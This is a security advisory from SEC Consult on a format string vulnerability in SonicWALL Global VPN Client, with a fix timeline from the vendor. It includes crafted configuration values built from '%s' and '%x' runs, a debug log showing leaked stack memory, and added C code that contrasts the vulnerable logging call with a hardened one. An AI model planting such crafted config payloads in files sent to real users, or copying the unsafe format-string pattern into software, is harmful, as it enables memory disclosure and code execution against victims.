SonicWALL Global VPN Client Format String Vulnerability

SEC Consult Security Advisory < 20071204-0 >

=====================================================================================

title: SonicWALL Global VPN Client Format String Vulnerability

program: SonicWALL Global VPN Client

vulnerable version: < 4.0.0.830

homepage: www.sonicwall.com

found: 06-12-2007

by: lofi42*

=====================================================================================

Vendor description:

---------------

The SonicWALL Global VPN Client provides mobile users with access to mission-critical network resources by establishing secure connections to their office network's IPSec-compliant SonicWALL VPN gateway.

Vulnerability overview:

---------------

SonicWALL Global VPN Client suffers from a format string vulnerability that can be triggered by supplying a specially crafted configuration file. This vulnerability could allow an attacker to execute arbitrary code in the context of the vulnerable client. For a successful attack, the attacker would have to entice his victim into importing the special configuration file.

Vulnerability details:

---------------

Format string errors occur when the client parses the "name" attribute of the "Connection" tag and the content of the "HostName" tags in the configuration file.

Examples:

<Connection name=%s%s%s%s> 
<HostName>%s%s%s%s</HostName>

The bugs have been verified in versions 3.1.556 and 4.0.0.810. With version 3.1.556 the client has to initiate a connection to trigger the vulnerability, whereas with the 4.0.0.810 beta the bug can be exploited by simply double-clicking the configuration file. This can be attributed to the 4.0 version trying to write the imported configuration to an extra debug log.
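
The pattern behind this bug, as an added example that is not SonicWALL's code: a logger that would use the imported connection name as its format string (left in as a comment only), the corrected call that passes the name as a "%s" argument so that any "%x" sequences are copied literally, and a check an importer could apply to reject connection names and hostnames carrying conversion directives before they reach any logging or display path. The message text is modelled on the debug log excerpt below; the function names and the sample values are assumptions.

```c
/*
 * Added example, not SonicWALL code: the vulnerable logging pattern described
 * in the advisory next to its hardened form, plus an import-time check.
 * Function names and message text are assumptions modelled on the log excerpt.
 */
#include <stdio.h>
#include <string.h>

#define LOG_MAX 256

/* Vulnerable pattern (kept as a comment so this file is safe to compile and run):
 *     snprintf(out, LOG_MAX, untrusted_value);
 * The imported value becomes the format string, so every "%x" it carries reads
 * one stack word into the log, exactly what the advisory's debug log shows. */

/* Hardened form: the format string is a compile-time constant and the imported
 * value is only ever a "%s" argument, so '%' characters in it are copied verbatim.
 * Returns snprintf's result (chars that would have been written, -1 on error). */
static int log_connection_enabled(char *out, size_t outsz, const char *name)
{
    return snprintf(out, outsz, "The connection \"%s\" has been enabled.", name);
}

/* Count conversion directives in an untrusted value. "%%" is a literal percent
 * sign and is not counted. A non-zero result on a connection name or hostname
 * is a sensible import-time rejection criterion and a detection signal for
 * configuration files arriving by mail or download. */
static int count_format_directives(const char *s)
{
    int count = 0;
    for (; *s; s++) {
        if (*s != '%')
            continue;
        if (s[1] == '%') {      /* escaped percent: skip both characters */
            s++;
            continue;
        }
        count++;
    }
    return count;
}

/* Conservative acceptance policy for a connection name or hostname:
 * non-empty, bounded length, printable ASCII only, no format directives.
 * Returns 1 if the value may be accepted, 0 otherwise. */
static int config_value_is_safe(const char *s, size_t maxlen)
{
    size_t len = strlen(s);
    if (len == 0 || len > maxlen)
        return 0;
    if (count_format_directives(s) != 0)
        return 0;
    for (size_t i = 0; i < len; i++) {
        unsigned char c = (unsigned char)s[i];
        if (c < 0x20 || c > 0x7e)
            return 0;
    }
    return 1;
}

int main(void)
{
    const char *benign  = "Office VPN";                  /* constructed sample */
    const char *hostile = "AAAAAAAAAA%x.%x.%x.%x.%x";   /* modelled on the advisory's PoC */
    char line[LOG_MAX];

    /* With the constant format string the "%x" run is logged literally. */
    log_connection_enabled(line, sizeof line, hostile);
    printf("%s\n", line);

    printf("\"%s\": directives=%d safe=%d\n", benign,
           count_format_directives(benign), config_value_is_safe(benign, 64));
    printf("\"%s\": directives=%d safe=%d\n", hostile,
           count_format_directives(hostile), config_value_is_safe(hostile, 64));
    return 0;
}
```

The import check is a defence in depth, not a substitute for the fix: the root cause is the variable format string, and `-Wformat-security` (GCC/Clang) flags the commented-out call at compile time.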

Proof-of-concept:

---------------

In 4.0.0.810, the bug can be beautifully demonstrated by supplying a crafted config file and then viewing the debug logfile. A configuration like this...

<Connection name=> AAAAAAAAAA%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x 
<HostName> BBBBBBBBBB%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x 

...yields the following logfile:

----------------------< Connection name >-----------------------------------
OnLogMessage(): 'The connection "AAAAAAAAAAe64d20.37327830.46413139.
203a3833.782b8d00.6f4c6e4f.73654d67.65676173.203a2928.65685427.
6e6f6320.7463656e.206e6f69.41414122.41414141.25414141" has been enabled.' ''
----------------------</Connection name >-----------------------------------
----------------------<HostName>--------------------------------------------
BBBBBBBBBB656d616e.41414120.41414141.25414141.78252e78.2e78252e.252e7825.
78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.
74207825.6e61206f.20504920.72646461.2e737365.42272027.42424242.42424242'
----------------------</HostName>---------------------------------------

Vendor status:

---------------

vendor notified: 2007-08-16

vendor response: 2007-08-29

patch available: 2007-11-26

The issue has been fixed in SonicWALL Global VPN Client 4.0.0.830.